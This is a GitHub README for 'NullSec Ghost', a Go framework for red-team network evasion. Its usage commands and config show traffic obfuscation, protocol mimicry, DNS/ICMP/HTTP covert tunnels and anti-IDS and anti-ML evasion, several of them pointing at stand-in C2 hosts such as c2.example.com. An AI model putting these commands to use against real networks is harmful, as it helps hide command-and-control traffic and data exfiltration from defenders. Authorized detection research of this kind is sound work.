Skip to content

README.md

Latest commit

 

History

History
150 lines (108 loc) · 3.5 KB

README.md

File metadata and controls

150 lines (108 loc) · 3.5 KB

👻 NullSec Ghost

Go License Version

Advanced Network Stealth & Evasion Framework

Traffic Obfuscation • Protocol Mimicry • Covert Channels • Anti-Detection

🎯 Overview

NullSec Ghost is a comprehensive network stealth framework written in Go. It provides tools for traffic obfuscation, protocol mimicry, and covert channel establishment for authorized red team operations and security research.

⚡ Features

Feature Description
🌊 Traffic Obfuscation Scramble, pad, and encrypt network traffic
🎭 Protocol Mimicry Make traffic appear as legitimate protocols
📡 Covert Channels DNS, ICMP, HTTP tunneling
🔀 Traffic Shaping Normalize patterns to avoid ML detection
🛡️ Anti-IDS Evade signature-based detection
🌐 Multi-Hop Chain proxies with protocol mixing

🛠️ Components

1. Traffic Obfuscator

# Obfuscate outbound traffic
ghost obfuscate --mode scramble --target 10.0.0.1:443

# Pad traffic to fixed sizes
ghost obfuscate --mode padding --size 1024

# XOR encrypt with rotating key
ghost obfuscate --mode xor --key random

2. Protocol Mimicry

# Mimic HTTPS traffic
ghost mimic --protocol https --target c2.example.com

# Mimic DNS queries
ghost mimic --protocol dns --target dns.example.com

# Mimic Slack/Teams webhooks
ghost mimic --protocol webhook --platform slack

3. Covert Channels

# DNS tunneling
ghost covert dns --domain tunnel.example.com --mode bidirectional

# ICMP tunneling
ghost covert icmp --target 10.0.0.1 --payload-size 64

# HTTP covert channel
ghost covert http --url https://example.com/api --method cookies

4. Traffic Shaping

# Normalize traffic timing
ghost shape --mode timing --interval 100ms --jitter 20ms

# Mimic browser patterns
ghost shape --profile chrome --sites google.com,github.com

# Anti-ML evasion
ghost shape --mode ml-evasion --model random-forest

📦 Installation

# From source
go build -o ghost ./cmd/ghost

# Install
sudo mv ghost /usr/local/bin/

🔧 Configuration

# ghost.yaml
obfuscation:
  enabled: true
  mode: scramble
  padding: true
  pad_size: 1024
  
mimicry:
  protocol: https
  user_agent: "Mozilla/5.0..."
  tls_fingerprint: chrome
  
covert:
  channel: dns
  domain: tunnel.example.com
  encoding: base32
  
shaping:
  timing:
    interval: 100ms
    jitter: 20%
  burst_size: 5
  profile: browser

🎭 Evasion Modes

Passive Mode

Observe and adapt to network patterns without generating suspicious traffic.

Active Mode

Actively obfuscate and disguise all outbound communications.

Chameleon Mode

Dynamically switch protocols and patterns based on network environment.

# Chameleon mode - auto-adapt
ghost --mode chameleon --target c2.example.com

🔬 Research Applications

  • Network detection system testing
  • IDS/IPS evasion research
  • Traffic analysis countermeasures
  • Red team C2 infrastructure
  • Covert communication research